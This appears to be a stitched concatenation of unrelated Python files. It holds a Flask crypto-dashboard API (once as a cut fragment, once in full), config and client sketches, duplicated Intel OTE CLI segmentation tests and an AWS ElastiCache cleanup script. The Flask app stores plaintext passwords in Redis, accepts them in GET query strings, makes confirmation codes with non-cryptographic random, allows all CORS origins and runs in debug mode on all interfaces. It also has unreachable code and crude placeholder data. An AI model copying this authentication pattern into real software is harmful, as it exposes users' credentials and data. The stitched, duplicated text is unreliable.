Quisque ut fringilla dolor.', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' } ] return json.dumps(dick) @app.route('/news', methods=['GET']) def new(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) print(r.get('news').decode("utf-8")) return r.get('news').decode("utf-8") @app.route('/current_cap/<coin>', methods=['GET']) def current_cap(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="1") return f'{dat['market_caps'][0][0]}=>{dat['market_caps'][0][1]}' @app.route('/caps_chart/<coin>', methods=['GET']) def caps_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/price_chart/<coin>', methods=['GET']) def price_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/table', methods=['GET']) def table(): print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") if not cg.ping(): return 'Connection down' dat = cg.get_price(ids=ds, vs_currencies='usd,eur', include_market_cap='true', include_24hr_vol='true', include_24hr_change='true', include_last_updated_at='true') refuge = [] for i in dat: dat[i].update({"name": i}) if None in list(dat[i].values()): continue refuge.append(dat[i]) # r.set('table', json.dumps(refuge)) print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") @app.route('/raw_data') def raw_data(): url = 'https://rest.coinapi.io/v1/exchanges' headers = {'X-CoinAPI-Key': config['X-CoinAPI-Key']} response = requests.get(url, headers=headers) return str(response.content) # User @app.route('/set_user_data', methods=['GET', 'POST', 'PUT']) def set_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): r.set(request.args.get('email') + "_data", request.args.get('dat')) return "Complete" return "Incorrect email or password" if request.method == 'POST' or request.method == 'PUT': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): r.set(request.form.get('email') + "_data", request.form.get('dat')) return "Complete" return "Incorrect email or password" return 'Incorrect request' @app.route('/get_user_data', methods=['GET', 'POST']) def get_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): return r.get(request.args.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' if request.method == 'POST': if request.form.get('pass') == 
r.get(request.form.get('email')).decode("utf-8"): return r.get(request.form.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' return 'Incorrect request' @app.route('/registration', methods=['GET', 'POST']) def registration(): if request.method == 'GET': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.args.get('email'), code + " " + request.args.get('pass')) message = f''' Hello, {request.args.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.args.get('email'), 'Confirmation code', message) if request.method == 'POST': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.form.get('email'), code + " " + request.form.get('pass')) message = f''' Hello, {request.form.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.form.get('email'), 'Confirmation code', message) return "Complete" @app.route('/confirmation', methods=['GET', 'POST']) def confirmation(): if request.method == 'GET': if r.get(request.args.get('email')).decode("utf-8")[:6] == request.args.get('code'): r.set(request.args.get('email'), r.get(request.args.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" if request.method == 'POST': if r.get(request.form.get('email')).decode("utf-8")[:6] == request.form.get('code'): r.set(request.form.get('email'), r.get(request.form.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" return 'Incorrect request' @app.route('/subscribe', methods=['GET', 'POST', 'PATCH']) def subscribe(): if request.method == 'GET': dat = r.get('subscribers').decode("utf-8") + ',' + request.args.get('email') print(request.args.get('email')) r.set('subscribers', dat) return "Successful" if request.method == 'POST' or request.method == 'PATCH': dat = r.get('subscribers').decode("utf-8") + ',' + request.form.get('email') print(request.form.get('email')) r.set('subscribers', dat) return "Successful" return 'Incorrect request' if __name__ == '__main__': app.run(host='0.0.0.0', port=PORT, debug=True)
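# --- Illustrative sketch (not part of the app above) ----------------------------------
# The service above loads all of its settings from config.json at import time. The keys
# below are the ones actually read in the code (config['...']); every value here is a
# placeholder, not a real credential or endpoint.
import json

example_config = {
    "template_folder": "templates",
    "APP_SECRET_KEY": "change-me",
    "redis-URI": "redis://localhost:6379/0",
    "corporative-email": "noreply@example.com",
    "corporative-email-password": "app-password",
    "cryptonews_api": "cryptonews-api-key",
    "company-name": "Example Inc.",
    "X-CoinAPI-Key": "coinapi-key",
    "ds": ["bitcoin", "ethereum"],  # coin ids passed to CoinGecko's get_price()
}

# with open("config.json", "w") as f:
#     json.dump(example_config, f, indent=2)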
from flask import Flask, redirect, url_for, render_template, send_from_directory from pycoingecko import CoinGeckoAPI from modules import news, email from flask_cors import CORS from flask import request import datetime import requests import random import string import redis import json import os # video: json_file = open('config.json') config = json.load(json_file) cg = CoinGeckoAPI() ds = config['ds'] app = Flask(__name__, template_folder=config['template_folder']) app.secret_key = config['APP_SECRET_KEY'] CORS(app, resources={r"/*": {"origins": "*"}}) PORT = int(os.environ.get('PORT', 5000)) r = redis.from_url(config['redis-URI']) sender_mail = config['corporative-email'] password = config['corporative-email-password'] # Settings @app.route('/', methods=['GET']) def zero(): return redirect(url_for('home'), code=302) @app.route('/home', methods=['GET']) def home(): return render_template('index.html') @app.route('/about', methods=['GET']) def about(): return render_template('about.html') @app.route('/api', methods=['GET']) def api(): return render_template('api.html') @app.route('/static/<path:path>', methods=['GET']) def static_files(path): return send_from_directory('static', path) # APIs @app.route('/arsen_posts', methods=['GET']) def arsen_posts(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) # print(r.get('news').decode("utf-8")) # print(len(json.loads(r.get('news').decode("utf-8")))) dick = [ { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer facilisis nunc et felis rutrum feugiat. Phasellus lorem ex, tincidunt sit amet diam quis, laoreet rhoncus nulla. Vestibulum tristique id est sed pulvinar. Nam elementum eget tellus eget malesuada. Fusce consectetur, felis et euismod faucibus, turpis lacus imperdiet metus, ac ultricies diam urna id nisi. Proin pharetra viverra cursus. Proin ornare ex erat, a luctus orci consequat eu. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam luctus aliquam lacus, sit amet aliquam neque mollis vel. Quisque eleifend pellentesque pulvinar. Nulla facilisi. Quisque ac lorem nec nisi ornare pulvinar in quis nulla. 
Quisque ut fringilla dolor.', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' }, { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'I Am Gay', 'link': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg' } ] return json.dumps(dick) @app.route('/news', methods=['GET']) def new(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) print(r.get('news').decode("utf-8")) return r.get('news').decode("utf-8") @app.route('/current_cap/<coin>', methods=['GET']) def current_cap(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="1") return f'{dat["market_caps"][0][0]}=>{dat["market_caps"][0][1]}' @app.route('/caps_chart/<coin>', methods=['GET']) def caps_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/price_chart/<coin>', methods=['GET']) def price_chart(coin): if not cg.ping(): return 'Connection down' dat = cg.get_coin_market_chart_by_id(id=coin, vs_currency="usd", days="7") x, y = [i[0] for i in dat['market_caps']], [i[1] for i in dat['market_caps']] ay = (sum(y) / len(y)) return '{"xValues":' + str(x) + ',"yValues":' + str(y) + ',"Min":' + str(min(y) - ay / 16) + ',"Max":' + str( max(y) + ay / 16) + '}' @app.route('/table', methods=['GET']) def table(): print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") if not cg.ping(): return 'Connection down' dat = cg.get_price(ids=ds, vs_currencies='usd,eur', include_market_cap='true', include_24hr_vol='true', include_24hr_change='true', include_last_updated_at='true') refuge = [] for i in dat: dat[i].update({"name": i}) if None in list(dat[i].values()): continue refuge.append(dat[i]) # r.set('table', json.dumps(refuge)) print(r.get('table').decode("utf-8")) return r.get('table').decode("utf-8") @app.route('/raw_data') def raw_data(): url = 'https://rest.coinapi.io/v1/exchanges' headers = {'X-CoinAPI-Key': config['X-CoinAPI-Key']} response = requests.get(url, headers=headers) return str(response.content) # User @app.route('/set_user_data', methods=['GET', 'POST', 'PUT']) def set_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): r.set(request.args.get('email') + "_data", request.args.get('dat')) return "Complete" return "Incorrect email or password" if request.method == 'POST' or request.method == 'PUT': if request.form.get('pass') == r.get(request.form.get('email')).decode("utf-8"): r.set(request.form.get('email') + "_data", request.form.get('dat')) return "Complete" return "Incorrect email or password" return 'Incorrect request' @app.route('/get_user_data', methods=['GET', 'POST']) def get_user_data(): if request.method == 'GET': if request.args.get('pass') == r.get(request.args.get('email')).decode("utf-8"): return r.get(request.args.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' if request.method == 'POST': if request.form.get('pass') == 
r.get(request.form.get('email')).decode("utf-8"): return r.get(request.form.get('email') + "_data").decode("utf-8") return 'Incorrect email or password' return 'Incorrect request' @app.route('/registration', methods=['GET', 'POST']) def registration(): if request.method == 'GET': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.args.get('email'), code + " " + request.args.get('pass')) message = f''' Hello, {request.args.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.args.get('email'), 'Confirmation code', message) if request.method == 'POST': code = ''.join(random.choice(string.ascii_uppercase) for _ in range(6)) r.set(request.form.get('email'), code + " " + request.form.get('pass')) message = f''' Hello, {request.form.get('name')}! Your confirmation code is: {code} Please, do not tell it nobody and not reply to this email ... {config['company-name']} at: {datetime.datetime.now()} ''' email.send_email(config['corporative-email'], config['corporative-email-password'], request.form.get('email'), 'Confirmation code', message) return "Complete" @app.route('/confirmation', methods=['GET', 'POST']) def confirmation(): if request.method == 'GET': if r.get(request.args.get('email')).decode("utf-8")[:6] == request.args.get('code'): r.set(request.args.get('email'), r.get(request.args.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" if request.method == 'POST': if r.get(request.form.get('email')).decode("utf-8")[:6] == request.form.get('code'): r.set(request.form.get('email'), r.get(request.form.get('email')).decode("utf-8")[7:]) return "Successful" return "Unsuccessful" return 'Incorrect request' @app.route('/subscribe', methods=['GET', 'POST', 'PATCH']) def subscribe(): if request.method == 'GET': dat = r.get('subscribers').decode("utf-8") + ',' + request.args.get('email') print(request.args.get('email')) r.set('subscribers', dat) return "Successful" if request.method == 'POST' or request.method == 'PATCH': dat = r.get('subscribers').decode("utf-8") + ',' + request.form.get('email') print(request.form.get('email')) r.set('subscribers', dat) return "Successful" return 'Incorrect request' if __name__ == '__main__': app.run(host='0.0.0.0', port=PORT, debug=True)
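# --- Illustrative sketch (not part of the app above) ----------------------------------
# Example client-side walk-through of the user endpoints defined above, assuming the
# service is running locally on port 5000. The email address, password, and confirmation
# code are placeholders; the real code is the 6-letter string sent by email during
# registration.
import requests

BASE = "http://localhost:5000"

# 1) Register: the server stores "<code> <password>" under the email key in Redis and
#    emails the confirmation code to the user.
requests.post(f"{BASE}/registration",
              data={"name": "Alice", "email": "alice@example.com", "pass": "s3cret"})

# 2) Confirm: on a match of the first six characters, the stored value is trimmed to the
#    bare password, which the data endpoints then check against.
print(requests.post(f"{BASE}/confirmation",
                    data={"email": "alice@example.com", "code": "ABCDEF"}).text)

# 3) Store and read back per-user data, authenticated with email + password.
requests.post(f"{BASE}/set_user_data",
              data={"email": "alice@example.com", "pass": "s3cret",
                    "dat": '{"watchlist": ["bitcoin"]}'})
print(requests.post(f"{BASE}/get_user_data",
                    data={"email": "alice@example.com", "pass": "s3cret"}).text)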
# Copyright (C) 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions # and limitations under the License. import json import os from subprocess import run import pytest from ote_cli.registry import Registry from tests.ote_cli.common import collect_env_vars, get_some_vars, create_venv, patch_demo_py args = { '--train-ann-file': 'data/segmentation/custom/annotations/training', '--train-data-roots': 'data/segmentation/custom/images/training', '--val-ann-file': 'data/segmentation/custom/annotations/training', '--val-data-roots': 'data/segmentation/custom/images/training', '--test-ann-files': 'data/segmentation/custom/annotations/training', '--test-data-roots': 'data/segmentation/custom/images/training', } root = '/tmp/ote_cli/' ote_dir = os.getcwd() templates = Registry('external').filter(task_type='SEGMENTATION').templates templates_ids = [template.model_template_id for template in templates] @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_train(template): work_dir, template_work_dir, algo_backend_dir = get_some_vars(template, root) create_venv(algo_backend_dir, work_dir, template_work_dir) command_line = ['ote', 'train', template.model_template_id, '--train-ann-file', f'{os.path.join(ote_dir, args['--train-ann-file'])}', '--train-data-roots', f'{os.path.join(ote_dir, args['--train-data-roots'])}', '--val-ann-file', f'{os.path.join(ote_dir, args['--val-ann-file'])}', '--val-data-roots', f'{os.path.join(ote_dir, args['--val-data-roots'])}', '--save-model-to', f'{template_work_dir}/trained_{template.model_template_id}', 'params', '--learning_parameters.num_iters', '2', '--learning_parameters.batch_size', '2'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/weights.pth') assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_export(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'export', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', f'--save-model-to', f'{template_work_dir}/exported_{template.model_template_id}'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.bin') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args['--test-ann-files'])}', '--test-data-roots', f'{os.path.join(ote_dir, args['--test-data-roots'])}', 
'--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--save-performance', f'{template_work_dir}/trained_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args['--test-ann-files'])}', '--test-data-roots', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--save-performance', f'{template_work_dir}/exported_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') with open(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') as read_file: trained_performance = json.load(read_file) with open(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') as read_file: exported_performance = json.load(read_file) for k in trained_performance.keys(): assert abs(trained_performance[k] - exported_performance[k]) / trained_performance[k] <= 0.01, f"{trained_performance[k]=}, {exported_performance[k]=}" @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--input', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--input', f'{os.path.join(ote_dir, args['--test-data-roots'])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_deploy_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) deployment_dir = f'{template_work_dir}/deployed_{template.model_template_id}' command_line = ['ote', 'deploy', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', f'--save-model-to', deployment_dir] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert run(['unzip', 'openvino.zip'], cwd=deployment_dir).returncode == 0 assert run(['python3', '-m', 'venv', 'venv'], cwd=os.path.join(deployment_dir, 'python')).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'wheel'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'demo_package-0.0-py3-none-any.whl'], cwd=os.path.join(deployment_dir, 'python'), 
env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 patch_demo_py(os.path.join(deployment_dir, 'python', 'demo.py'), os.path.join(deployment_dir, 'python', 'demo_patched.py')) assert run(['python3', 'demo_patched.py', '-m', '../model/model.xml', '-i', f'{os.path.join(ote_dir, args['--test-data-roots'])}'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0
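# --- Illustrative sketch (not part of the test module above) --------------------------
# Every test above is parametrized over the SEGMENTATION templates found in the
# 'external' registry, with template.model_template_id used both as the pytest id and in
# the work-dir paths under /tmp/ote_cli/. Listing the collected ids (the same Registry
# call used above) is a convenient way to pick a value for pytest's -k filter, e.g.
#   pytest <path-to-this-test-module> -k "<model_template_id>"
# (the module path depends on how the repository is checked out).
from ote_cli.registry import Registry

for template in Registry('external').filter(task_type='SEGMENTATION').templates:
    print(template.model_template_id)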
# Copyright (C) 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions # and limitations under the License. import json import os from subprocess import run import pytest from ote_cli.registry import Registry from tests.ote_cli.common import collect_env_vars, get_some_vars, create_venv, patch_demo_py args = { '--train-ann-file': 'data/segmentation/custom/annotations/training', '--train-data-roots': 'data/segmentation/custom/images/training', '--val-ann-file': 'data/segmentation/custom/annotations/training', '--val-data-roots': 'data/segmentation/custom/images/training', '--test-ann-files': 'data/segmentation/custom/annotations/training', '--test-data-roots': 'data/segmentation/custom/images/training', } root = '/tmp/ote_cli/' ote_dir = os.getcwd() templates = Registry('external').filter(task_type='SEGMENTATION').templates templates_ids = [template.model_template_id for template in templates] @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_train(template): work_dir, template_work_dir, algo_backend_dir = get_some_vars(template, root) create_venv(algo_backend_dir, work_dir, template_work_dir) command_line = ['ote', 'train', template.model_template_id, '--train-ann-file', f'{os.path.join(ote_dir, args["--train-ann-file"])}', '--train-data-roots', f'{os.path.join(ote_dir, args["--train-data-roots"])}', '--val-ann-file', f'{os.path.join(ote_dir, args["--val-ann-file"])}', '--val-data-roots', f'{os.path.join(ote_dir, args["--val-data-roots"])}', '--save-model-to', f'{template_work_dir}/trained_{template.model_template_id}', 'params', '--learning_parameters.num_iters', '2', '--learning_parameters.batch_size', '2'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/weights.pth') assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_export(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'export', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', f'--save-model-to', f'{template_work_dir}/exported_{template.model_template_id}'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/openvino.bin') assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/label_schema.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args["--test-ann-files"])}', '--test-data-roots', f'{os.path.join(ote_dir, args["--test-data-roots"])}', 
'--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--save-performance', f'{template_work_dir}/trained_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_eval_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'eval', template.model_template_id, '--test-ann-file', f'{os.path.join(ote_dir, args["--test-ann-files"])}', '--test-data-roots', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--save-performance', f'{template_work_dir}/exported_{template.model_template_id}/performance.json'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert os.path.exists(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') with open(f'{template_work_dir}/trained_{template.model_template_id}/performance.json') as read_file: trained_performance = json.load(read_file) with open(f'{template_work_dir}/exported_{template.model_template_id}/performance.json') as read_file: exported_performance = json.load(read_file) for k in trained_performance.keys(): assert abs(trained_performance[k] - exported_performance[k]) / trained_performance[k] <= 0.01, f"{trained_performance[k]=}, {exported_performance[k]=}" @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/trained_{template.model_template_id}/weights.pth', '--input', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_demo_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) command_line = ['ote', 'demo', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', '--input', f'{os.path.join(ote_dir, args["--test-data-roots"])}', '--delay', '-1'] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 @pytest.mark.parametrize("template", templates, ids=templates_ids) def test_ote_deploy_openvino(template): work_dir, template_work_dir, _ = get_some_vars(template, root) deployment_dir = f'{template_work_dir}/deployed_{template.model_template_id}' command_line = ['ote', 'deploy', template.model_template_id, '--load-weights', f'{template_work_dir}/exported_{template.model_template_id}/openvino.xml', f'--save-model-to', deployment_dir] assert run(command_line, env=collect_env_vars(work_dir)).returncode == 0 assert run(['unzip', 'openvino.zip'], cwd=deployment_dir).returncode == 0 assert run(['python3', '-m', 'venv', 'venv'], cwd=os.path.join(deployment_dir, 'python')).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'wheel'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 assert run(['python3', '-m', 'pip', 'install', 'demo_package-0.0-py3-none-any.whl'], cwd=os.path.join(deployment_dir, 'python'), 
env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0 patch_demo_py(os.path.join(deployment_dir, 'python', 'demo.py'), os.path.join(deployment_dir, 'python', 'demo_patched.py')) assert run(['python3', 'demo_patched.py', '-m', '../model/model.xml', '-i', f'{os.path.join(ote_dir, args["--test-data-roots"])}'], cwd=os.path.join(deployment_dir, 'python'), env=collect_env_vars(os.path.join(deployment_dir, 'python'))).returncode == 0
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may # not use this file except in compliance with the License. A copy of the # License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """Cleans up the resources created by the Elasticache bootstrapping process. """ import boto3 import logging from elasticache.service_bootstrap import BootstrapResources def delete_sns_topic(topic_ARN: str): sns = boto3.client("sns") sns.delete_topic(TopicArn=topic_ARN) logging.info(f"Deleted SNS topic {topic_ARN}") def delete_security_group(sg_id: str): ec2 = boto3.client("ec2") ec2.delete_security_group(GroupId=sg_id) logging.info(f"Deleted VPC Security Group {sg_id}") def delete_user_group(usergroup_id: str): ec = boto3.client("elasticache") ec.delete_user_group(UserGroupId=usergroup_id) logging.info(f"Deleted ElastiCache User Group {usergroup_id}") # KMS does not allow immediate key deletion; 7 days is the shortest deletion window def delete_kms_key(key_id: str): kms = boto3.client("kms") kms.schedule_key_deletion(KeyId=key_id, PendingWindowInDays=7) logging.info(f"Deletion scheduled for KMS key {key_id}") # delete snapshot and also associated cluster/RG def delete_snapshot(snapshot_name: str): ec = boto3.client("elasticache") # delete actual snapshot response = ec.describe_snapshots(SnapshotName=snapshot_name) snapshot = response['Snapshots'][0] ec.delete_snapshot(SnapshotName=snapshot_name) logging.info(f"Deleted snapshot {snapshot_name}") # delete resource that was used to create snapshot if snapshot['CacheClusterId']: ec.delete_cache_cluster(CacheClusterId=snapshot['CacheClusterId']) logging.info(f"Deleted cache cluster {snapshot["CacheClusterId"]}") elif snapshot['ReplicationGroupId']: # should not happen ec.delete_replication_group(ReplicationGroupId=snapshot['ReplicationGroupId']) logging.info(f"Deleted replication group {snapshot["ReplicationGroupId"]}") def service_cleanup(config: dict): logging.getLogger().setLevel(logging.INFO) resources = BootstrapResources( **config ) try: delete_sns_topic(resources.SnsTopicARN) except: logging.exception(f"Unable to delete SNS topic {resources.SnsTopicARN}") try: delete_security_group(resources.SecurityGroupID) except: logging.exception(f"Unable to delete VPC Security Group {resources.SecurityGroupID}") try: delete_user_group(resources.UserGroupID) except: logging.exception(f"Unable to delete ElastiCache User Group {resources.UserGroupID}") try: delete_kms_key(resources.KmsKeyID) except: logging.exception(f"Unable to schedule deletion for KMS key {resources.KmsKeyID}") try: delete_snapshot(resources.SnapshotName) except: logging.exception(f"Unable to delete snapshot {resources.SnapshotName}")
